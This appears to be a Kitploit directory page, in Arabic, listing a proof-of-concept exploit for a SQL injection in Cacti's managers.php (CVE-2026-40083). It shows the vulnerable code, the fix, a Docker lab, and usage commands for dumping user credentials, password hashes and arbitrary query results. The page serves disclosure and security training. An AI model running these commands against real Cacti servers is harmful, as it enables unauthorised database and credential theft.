Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-40083 — استغلال إثبات المفهوم لـ CVE-2026-40083، وهو حقن SQL في Cacti managers.php يسمح للمستخدمين المصادق عليهم باستخراج قواعد بيانات MySQL وبيانات اعتماد المستخدم وتجزئات كلمات المرور. يتضمن مختبر Docker للاختبار. | Kitploit
أدوات/GitHubGitHub/hakaioffsec/cve-2026-40083
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي
GitHubhakaioffsec/cve-2026-40083

CVE-2026-40083

استغلال إثبات المفهوم لـ CVE-2026-40083، وهو حقن SQL في Cacti managers.php يسمح للمستخدمين المصادق عليهم باستخراج قواعد بيانات MySQL وبيانات اعتماد المستخدم وتجزئات كلمات المرور. يتضمن مختبر Docker للاختبار.

عرض المستودع
22منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

حقن SQL في Cacti managers.php

استغلال برهان المفهوم لـ CVE-2026-40083، ثغرة حقن SQL في managers.php الخاصة بـ Cacti تسمح لأي مستخدم مصدق لديه صلاحيات مدير SNMP بقراءة قاعدة بيانات MySQL بأكملها بما في ذلك بيانات اعتماد المستخدم وتجزئات كلمات المرور.

الاستخدام:

root@kitploit:~
# Verify injection (time-based)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin

# Dump specific user credentials
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --target-id 1

# Extract arbitrary SQL query result
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --query "SELECT version()"

# Enumerate all users (scan IDs 1-50)
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --max-id 50

# With Burp proxy
$ python3 exploit/poc.py --url http://TARGET --user admin --password admin --proxy http://127.0.0.1:8080

الإصدارات المتأثرة

  • Cacti ≤ 1.2.30 (تم التصحيح في 1.2.31)

السبب الجذري

في managers.php، يتم إلغاء تسلسل إدخال المستخدم من selected_graphs_array عبر cacti_unserialize() ويتم دمجه مباشرة في SQL دون تعقيم:

root@kitploit:~
$selected_items = cacti_unserialize(stripslashes(gnrv('selected_graphs_array')));

if ($selected_items != false) {
    // No validation - direct implode into SQL
    db_execute('DELETE FROM snmpagent_managers WHERE id IN (' . implode(',', $selected_items) . ')');
}

يقبل معامل selected_graphs_array مصفوفة PHP متسلسلة. يتم دمج عناصر المصفوفة بفواصل وحقنها مباشرة في جملة IN.

نقاط النهاية المتأثرة

POST /managers.php (action=actions, drp_action=1|2|3)

التأثير

تسمح ثغرة حقن SQL للمستخدمين المصادقين الذين لديهم صلاحيات مدير SNMP بتنفيذ استعلامات عشوائية على قاعدة البيانات. وهذا يتيح قراءة الجداول التي تحتوي على بيانات المستخدم والإعدادات وبيانات اعتماد الجهاز ومجتمعات SNMP، بالإضافة إلى استخراج تجزئات bcrypt ورموز API، مما قد يؤدي إلى اختراق الحسابات. بالإضافة إلى ذلك، يسمح الخلل بتنفيذ أوامر تأخير زمني، مما قد يتسبب في رفض الخدمة عن طريق استنفاد اتصالات قاعدة البيانات المتزامنة.

CVSS

7.2 High CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

الإصلاح

يضيف الالتزام 52032e760 array_map('intval', $selected_items) قبل الدمج لتحويل جميع القيم إلى أعداد صحيحة.

إعداد المختبر

root@kitploit:~
docker-compose up -d --build

انتظر حوالي 30 ثانية للتهيئة. قم بالوصول إلى Cacti على http://localhost:8088

بيانات الاعتماد الافتراضية: admin / admin

root@kitploit:~
# Test exploit
python3 exploit/poc.py --url http://localhost:8088 --user admin --password admin --target-id 1

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية والبحثية فقط. استخدمها فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها. المؤلف غير مسؤول عن أي سوء استخدام أو ضرر ناتج عن هذا البرنامج.

QuimeraX Intelligence

QuimeraX Intelligence هي منصة متقدمة لإدارة السطح الهجومي (EASM) واستخبارات التهديدات السيبرانية متخصصة في تحديد الثغرات الحرجة في الأنظمة المعقدة. تقوم المنصة بمراقبة وكشف وتنبيه العملاء حول تهديدات الأمان بشكل استباقي، مما يضمن الشفافية والاستجابة السريعة للمخاطر المحتملة. يتلقى العملاء إشعارات فورية وتقارير شاملة إذا تم العثور على أنظمتهم معرضة للخطر، مما يمكنهم من اتخاذ إجراءات وقائية. تعرف على المزيد

Hakai Security

Hakai Security هي شركة أمن سيبراني أسسها محترفون في مجال الأمن، ملتزمة بالتميز التقني. نقدم حلول أمنية مخصصة تشمل اختبار الاختراق المتقدم، ومحاكاة الفريق الأحمر الواقعية، وممارسات التطوير الآمن لحماية أصول عملائنا بشكل استباقي من التهديدات السيبرانية المتطورة.

Hacking Club

Hacking Club هي منصة تدريب حيث تتعلم الأمن السيبراني من خلال دروس عملية ومختبرات وتحديات أنشأها خبراء يعملون في شركتنا الاستشارية الأمنية: مباشرة من ساحة المعركة إلى تدريبك. تدرب على الثغرة المعروضة في هذا المستودع من خلال hacking club! تعرف على المزيد

تنزيل الأداة